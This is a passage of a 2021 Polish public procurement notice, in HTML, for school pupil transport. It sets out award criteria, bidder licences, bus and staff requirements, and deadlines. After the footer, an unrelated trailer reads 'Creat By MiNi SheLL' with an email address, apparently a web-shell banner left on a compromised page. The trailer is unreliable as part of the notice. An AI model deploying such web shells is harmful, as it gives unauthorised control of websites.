podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku w tym zakresie<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie: posiadania uprawnień do prowadzenia określonej działalności zawodowej, jeżeli: Zamawiający wymaga aby Wykonawca posiadał aktualną licencję zezwalającą na przewóz osób pojazdami samochodowymi, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym ( Dz. U. z 2012 r. Nr 1265 ze zm.) Warunek ten zamawiający uzna za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie. <br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości jeżeli: <br/><br/>Warunek w zakresie doświadczenia:<br/><br/>•	Wykonawca wykaże, że wykonał lub wykonuje co najmniej 1 usługę polegającą na transporcie uczniów do szkół podstawowych i/lub gimnazjów i/lub przedszkoli wraz z zapewnieniem im opieki. Wykonana usługa powinna dotyczyć transportu dzieci do szkół na trasach o łącznej długości minimum 150 km dziennie. <br/><br/>Warunek w zakresie potencjału technicznego:<br/>•	Wykonawca wykaże, że dysponuje odpowiednim środkiem transportu, jednym autobusem przystosowanym do bezpiecznego przewozu dzieci i młodzieży, wyposażonym w minimum 40 miejsc siedzących. Warunki przewozu uczniów powinny być zorganizowane zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. 2019 r. poz. 2140 ze zm.) Każdy środek transportu musi posiadać aktualne badania techniczne , ubezpieczenie OC i NW. <br/><br/><br/>Warunek dotyczący osób skierowanych do realizacji zamówienia:<br/>•	Wykonawca wykaże, że dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe skierowanymi do realizacji zamówienia tj. <br/><br/>o	osoba zarządzająca przewozami posiadająca kwalifikacje potwierdzone certyfikatem kompetencji zawodowych;(minimum 1 osoba)<br/><br/>o kierowcy posiadający odpowiednie kwalifikacje do kierowania autobusami, dodatkowo posiadający co najmniej roczne doświadczenie zawodowe w kierowaniu autobusami (minimum jedna osoba);<br/><br/>o	opiekunem dowożonych dzieci, która musi spełniać następujące wymogi: osoba pełnoletnia, posiadająca zaświadczenie ukończenia kursu udzielania pierwszej pomocy przedmedycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na<br/>dzień złożenia, następujących podmiotowych środków dowodowych:1. Odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej , jeżeli ich posiadanie<br/>jest niezbędne do świadczenia określonych usług w kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument potwierdzający, że wykonawca posiada aktualną licencję zezwalającą na przewóz osób pojazdami samochodowymi, zgodnie z ustawą z dnia 6 września 2001 r.<br/>o transporcie drogowym (Dz. U. z 2012 r. Nr 1265 ze zm.).2. wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;3. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dowód rejestracyjny autobusu ( kserokopia/skan potwierdzona za zgodność z oryginałem) – Dowód rejestracyjny wymagany przez Zamawiającego ma na celu określenie właściciela pojazdu , potwierdzenie rocznika pojazdu przedstawionego w ofercie oraz sprawdzenie informacji zawartych w dowodzie rejestracyjnym potwierdzające ważność badań technicznych pojazdu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dowód rejestracyjny autobusu ( kserokopia/skan potwierdzona za zgodność z oryginałem) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II podrozdziale 9 pkt 2 SWZ. Oświadczenie składają odrębnie:- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu; a) Pełnomocnictwo • W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o zamówienie publiczne, którego dotyczy,- wszystkich wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego pełnomocnika oraz zakresu jego umocowania. b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek<br/>dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik<br/>uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający dopuszcza możliwość zmiany zaoferowanego środka transportu w trakcie realizacji umowy na pisemny umotywowany wniosek Wykonawcy. Zmiana pojazdu na pojazd o mniejszej ilości miejsc siedzących może mieć miejsce w przypadku mniejszej ilości uczniów na trasach dowożenia dzieci . Pojazd zaoferowany jako zamienny nie może być starszy od pojazdu zamienianego oraz musi posiadać ważną polisę OC oraz NNW o także ważne badania techniczne. Zmiana środka transportu nie powoduje zmiany wysokości wynagrodzenia Wykonawcy. Zmiana środka transportu będzie każdorazowo zależna od decyzji Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić (złożyć) na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/dabrowka w myśl Ustawy PZP na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-14</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com